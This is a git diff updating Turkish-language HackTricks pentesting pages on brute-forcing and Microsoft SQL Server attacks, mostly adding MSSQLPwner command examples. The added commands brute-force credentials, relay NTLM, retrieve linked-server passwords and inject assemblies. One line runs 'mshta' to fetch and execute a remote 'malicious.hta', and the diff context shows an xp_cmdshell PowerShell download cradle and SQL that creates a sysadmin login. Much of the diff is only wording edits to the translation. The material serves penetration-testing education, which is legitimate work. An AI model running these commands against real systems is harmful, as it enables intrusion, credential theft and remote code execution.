diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md index 0f771c173..2a608228d 100644 --- a/generic-methodologies-and-resources/brute-force.md +++ b/generic-methodologies-and-resources/brute-force.md @@ -240,6 +240,25 @@ use auxiliary/scanner/mongodb/mongodb_login legba mongodb --target localhost:27017 --username root --password data/passwords.txt ``` ### MSSQL + +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using tickets against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt + +# Bruteforce using passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt + +# Bruteforce using hashes against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt +``` + ```bash legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433 ``` @@ -405,11 +424,11 @@ legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --targ ``` #### Zayıf SSH anahtarları / Debian tahmin edilebilir PRNG -Bazı sistemler, kriptografik materyal oluşturmak için kullanılan rastgele tohumda bilinen hatalara sahiptir. Bu, [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute) gibi araçlarla bruteforce edilebilecek şekilde dramatik bir şekilde azaltılmış bir anahtar alanına yol açabilir. Ayrıca, [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) gibi önceden oluşturulmuş zayıf anahtar setleri de mevcuttur. +Bazı sistemler, kriptografik materyal oluşturmak için kullanılan rastgele tohumda bilinen hatalara sahiptir. Bu, [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute) gibi araçlarla bruteforce edilebilecek şekilde dramatik bir anahtar alanının azalmasına neden olabilir. Ayrıca, [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) gibi önceden oluşturulmuş zayıf anahtar setleri de mevcuttur. ### STOMP (ActiveMQ, RabbitMQ, HornetQ ve OpenMQ) -STOMP metin protokolü, **RabbitMQ, ActiveMQ, HornetQ ve OpenMQ gibi popüler mesaj kuyruklama hizmetleriyle kesintisiz iletişim ve etkileşim sağlar**. Mesajları değiştirmek ve çeşitli mesajlaşma işlemleri gerçekleştirmek için standartlaştırılmış ve verimli bir yaklaşım sunar. +STOMP metin protokolü, **RabbitMQ, ActiveMQ, HornetQ ve OpenMQ gibi popüler mesaj kuyruklama hizmetleriyle kesintisiz iletişim ve etkileşim sağlar.** Mesajları değiştirmek ve çeşitli mesajlaşma işlemleri gerçekleştirmek için standartlaştırılmış ve verimli bir yaklaşım sunar. ```bash legba stomp --target localhost:61613 --username admin --password data/passwords.txt ``` @@ -491,7 +510,7 @@ hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt ``` #### Bilinen düz metin zip saldırısı -Şifreli zip içinde bulunan bir dosyanın **düz metnini** (veya düz metnin bir kısmını) bilmeniz gerekiyor. Şifreli zip içinde bulunan **dosya adlarını ve dosyaların boyutunu** kontrol etmek için şunu çalıştırabilirsiniz: **`7z l encrypted.zip`**\ +Şifreli zip içinde bulunan bir dosyanın **düz metnini** (veya düz metnin bir kısmını) bilmeniz gerekir. Şifreli zip içinde bulunan **dosya adlarını ve dosyaların boyutunu** kontrol etmek için şunu çalıştırabilirsiniz: **`7z l encrypted.zip`**\ [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0)indirin. ```bash # You need to create a zip file containing only the file that is inside the encrypted zip @@ -601,7 +620,7 @@ john --wordlist=/usr/share/wordlists/rockyou.txt ./hash [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) kullanın ve ardından john -### Open Office Pwd Protected Column +### Open Office Pwd Korunan Sütun Eğer bir şifre ile korunan bir sütun içeren bir xlsx dosyanız varsa, onu korumasını kaldırabilirsiniz: @@ -648,7 +667,7 @@ hash-identifier ### **Wordlist Generation Tools** -* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Konfigüre edilebilir temel karakterler, tuş haritası ve rotalar ile gelişmiş klavye yürüyüşü üreteci. +* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Gelişmiş klavye yürüyüşü oluşturucu, yapılandırılabilir temel karakterler, tuş haritası ve rotalar ile. ```bash kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt ``` @@ -665,7 +684,7 @@ john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules * **Kelimeler listesi saldırısı** (`-a 0`) kurallarla -**Hashcat** zaten bir **kural içeren klasörle** birlikte gelir, ancak [**diğer ilginç kuralları burada bulabilirsiniz**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules). +**Hashcat** zaten **kuralları içeren bir klasörle** birlikte gelir, ancak [**diğer ilginç kuralları burada bulabilirsiniz**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules). ``` hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule ``` @@ -758,7 +777,7 @@ GCP Hacking'i öğrenin ve pratik yapın: HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! -* **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.** +* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.** * **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index c289b8da7..116a1d4d8 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -83,6 +83,26 @@ msf> use windows/manage/mssql_local_auth_bypass ### Manuel Sayım #### Giriş + + +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using tickets against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt + +# Bruteforce using passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt + +# Bruteforce using hashes against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt +``` + ```bash # Using Impacket mssqlclient.py mssqlclient.py [-db volume] /:@ @@ -182,7 +202,7 @@ EXEC sp_helprotect 'xp_cmdshell' ### OS Komutlarını Çalıştır {% hint style="danger" %} -Komutları çalıştırabilmek için sadece **`xp_cmdshell`** **etkin** olmasının yeterli olmadığını, aynı zamanda **`xp_cmdshell` saklı yordamında EXECUTE iznine** sahip olmanın da gerekli olduğunu unutmayın. **`xp_cmdshell`**'i kimlerin (sysadminler hariç) kullanabileceğini öğrenmek için: +Komutları çalıştırabilmek için sadece **`xp_cmdshell`** **etkin** olmasının yeterli olmadığını, aynı zamanda **`xp_cmdshell` saklı yordamında EXECUTE iznine** de sahip olmanız gerektiğini unutmayın. **`xp_cmdshell`**'i kimlerin (sysadminler hariç) kullanabileceğini öğrenmek için: ```sql Use master EXEC sp_helprotect 'xp_cmdshell' @@ -215,6 +235,20 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1 # Bypass blackisted "EXEC xp_cmdshell" '; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' — ``` +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Executing custom assembly on the current server with windows authentication and executing hostname command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname + +# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate +``` ### NetNTLM hash'ını Çal / Relay saldırısı Kimlik doğrulamada kullanılan hash'i yakalamak için bir **SMB sunucusu** başlatmalısınız (`impacket-smbserver` veya `responder` gibi). @@ -229,6 +263,17 @@ sudo responder -I tun0 sudo impacket-smbserver share ./ -smb2support msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ``` +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Issuing NTLM relay attack on the SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on the local server with custom command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 +``` {% hint style="warning" %} Bu MSSQL fonksiyonlarını çalıştırma iznine sahip olanların (sysadmin'ler dışında) kimler olduğunu kontrol edebilirsiniz: ```sql @@ -256,7 +301,7 @@ Bu araçları nasıl kullanacağınızı görebilirsiniz: ### **Dosya Yazma** -`MSSQL` kullanarak dosya yazmak için, **Ole Automation Procedures**'ı [**etkinleştirmemiz**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option) gerekir, bu da yönetici ayrıcalıkları gerektirir ve ardından dosyayı oluşturmak için bazı saklı yordamları çalıştırmalıyız: +`MSSQL` kullanarak dosya yazmak için, **[Ole Automation Procedures](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option)**'ı **etkinleştirmemiz** gerekiyor, bu da yönetici ayrıcalıkları gerektirir ve ardından dosyayı oluşturmak için bazı saklı yordamları çalıştırmalıyız: ```bash # Enable Ole Automation Procedures sp_configure 'show advanced options', 1 @@ -276,7 +321,7 @@ EXECUTE sp_OADestroy @OLE ``` ### **Dosyayı** OPENROWSET **ile oku** -Varsayılan olarak, `MSSQL`, **hesabın okuma erişimi olan işletim sistemindeki herhangi bir dosyayı okuma** iznine sahiptir. Aşağıdaki SQL sorgusunu kullanabiliriz: +Varsayılan olarak, `MSSQL`, **hesabın okuma erişimi olan işletim sistemindeki herhangi bir dosyada okuma yapmaya izin verir**. Aşağıdaki SQL sorgusunu kullanabiliriz: ```sql SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents ``` @@ -293,11 +338,11 @@ https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\w MSSQL, **Python ve/veya R**'de **scriptler** çalıştırmanıza izin verebilir. Bu kod, **xp\_cmdshell** kullanarak komutları çalıştıran **farklı bir kullanıcı** tarafından yürütülecektir. -Çalıştırmaya çalışan bir **'R'** _"Hellow World!"_ **çalışmıyor** örneği: +Çalıştırmaya çalışan bir örnek **'R'** _"Hellow World!"_ **çalışmıyor**: ![](<../../.gitbook/assets/image (393).png>) -Birçok işlem gerçekleştirmek için yapılandırılmış python kullanan örnek: +Birçok eylemi gerçekleştirmek için yapılandırılmış python kullanarak bir örnek: ```sql # Print the user being used (and execute commands) EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' @@ -398,7 +443,7 @@ Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlSer ``` ### Diğer kullanıcıların taklit edilmesi -SQL Server, **`IMPERSONATE`** adında özel bir izin sunar, bu izin **çalıştıran kullanıcının başka bir kullanıcının** veya oturum açmanın izinlerini almasına **imkan tanır**; bu, bağlam sıfırlanana kadar veya oturum sona erene kadar geçerlidir. +SQL Server, **`IMPERSONATE`** adında özel bir izin sunar, bu izin **çalıştıran kullanıcının başka bir kullanıcının veya oturum açmanın izinlerini almasına olanak tanır**; bu, bağlam sıfırlanana kadar veya oturum sona erene kadar geçerlidir. ```sql # Find users you can impersonate SELECT distinct b.name @@ -422,7 +467,7 @@ use_link [NAME] Eğer bir kullanıcıyı taklit edebiliyorsanız, hatta sysadmin olmasa bile, **kullanıcının diğer** **veritabanlarına** veya bağlı sunuculara erişimi olup olmadığını kontrol etmelisiniz. {% endhint %} -Not edin ki, bir kez sysadmin olduğunuzda, diğer herhangi birini taklit edebilirsiniz: +Not edin ki, bir kez sysadmin olduğunuzda, başka birini taklit edebilirsiniz: ```sql -- Impersonate RegUser EXECUTE AS LOGIN = 'RegUser' @@ -432,7 +477,7 @@ SELECT IS_SRVROLEMEMBER('sysadmin') -- Change back to sa REVERT ``` -Bu saldırıyı **metasploit** modülü ile gerçekleştirebilirsiniz: +Bu saldırıyı bir **metasploit** modülü ile gerçekleştirebilirsiniz: ```bash msf> auxiliary/admin/mssql/mssql_escalate_execute_as ``` @@ -557,7 +602,7 @@ GCP Hacking'i öğrenin ve pratik yapın: HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! -* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.** * **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. diff --git a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md index 0e25ac6e8..02f7958ae 100644 --- a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md +++ b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md @@ -1,8 +1,8 @@ -# MSSQL AD Abuse +# MSSQL AD Kötüye Kullanımı {% hint style="success" %} -AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -21,7 +21,73 @@ GCP Hacking'i öğrenin ve pratik yapın: +```shell +# Interactive mode +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive + +# Interactive mode with 2 depth level of impersonations +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive + + +# Executing custom assembly on the current server with windows authentication and executing hostname command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname + +# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate + +# Issuing NTLM relay attack on the SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on the local server with custom command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 + +# Executing direct query +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER" + +# Retrieving password from the linked server DC01 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password + +# Execute code using custom assembly on the linked server DC01 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll + +# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using tickets against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt + +# Bruteforce using passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt + +# Bruteforce using hashes against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt + +``` +### Alan oturumu olmadan ağdan numaralandırma +``` +# Interactive mode +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive +``` +--- +### Powershell + +Bu durumda [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) powershell modülü çok faydalıdır. ```powershell Import-Module .\PowerupSQL.psd1 ``` @@ -127,7 +193,7 @@ Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql ``` ### Metasploit -Trusted bağlantıları metasploit kullanarak kolayca kontrol edebilirsiniz. +Güvenilir bağlantıları metasploit kullanarak kolayca kontrol edebilirsiniz. ```bash #Set username, password, windows auth (if using AD), IP... msf> use exploit/windows/mssql/mssql_linkcrawler @@ -141,11 +207,11 @@ From **Linux** you could obtain a MSSQL console shell with **sqsh** and **mssqlc From **Windows** you could also find the links and execute commands manually using a **MSSQL client like** [**HeidiSQL**](https://www.heidisql.com) -_Windows kimlik doğrulaması ile giriş yapın:_ +_Login using Windows authentication:_ ![](<../../.gitbook/assets/image (808).png>) -#### Güvenilir Bağlantıları Bulun +#### Güvenilir Bağlantıları Bul ```sql select * from master..sysservers; EXEC sp_linkedservers; @@ -176,7 +242,7 @@ Eğer `openquery()` üzerinden `exec xp_cmdshell` gibi işlemleri gerçekleştir ### Manuel - EXECUTE -Ayrıca `EXECUTE` kullanarak güvenilir bağlantıları da kötüye kullanabilirsiniz: +Ayrıca, `EXECUTE` kullanarak güvenilir bağlantıları da kötüye kullanabilirsiniz: ```bash #Create user and give admin privileges EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" @@ -186,9 +252,9 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT **MSSQL yerel kullanıcısı** genellikle **`SeImpersonatePrivilege`** adı verilen özel bir yetkiye sahiptir. Bu, hesabın "kimlik doğrulamasından sonra bir istemciyi taklit etmesine" olanak tanır. -Birçok yazarın geliştirdiği bir strateji, bir SİSTEM hizmetini, saldırganın oluşturduğu sahte veya ortadaki adam hizmetine kimlik doğrulaması yapmaya zorlamaktır. Bu sahte hizmet, kimlik doğrulaması yapmaya çalışırken SİSTEM hizmetini taklit edebilir. +Birçok yazarın geliştirdiği bir strateji, bir SİSTEM hizmetini, saldırganın oluşturduğu sahte veya ortada adam hizmetine kimlik doğrulaması yapmaya zorlamaktır. Bu sahte hizmet, kimlik doğrulaması yapmaya çalışırken SİSTEM hizmetini taklit edebilir. -[SweetPotato](https://github.com/CCob/SweetPotato) bu çeşitli tekniklerin bir koleksiyonunu içerir ve bunlar Beacon'ın `execute-assembly` komutu aracılığıyla yürütülebilir. +[SweetPotato](https://github.com/CCob/SweetPotato) bu çeşitli tekniklerin bir koleksiyonuna sahiptir ve bunlar Beacon'ın `execute-assembly` komutu aracılığıyla yürütülebilir.
@@ -203,7 +269,7 @@ GCP Hacking'i öğrenin ve pratik yapın: HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! -* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.** +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.** * **Hacking ipuçlarını paylaşmak için [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.**
diff --git a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index f59c8702e..7fb27a672 100644 --- a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -9,7 +9,7 @@ GCP Hacking'i öğrenin ve pratik yapın: HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! -* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.** +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. @@ -17,11 +17,11 @@ GCP Hacking'i öğrenin ve pratik yapın: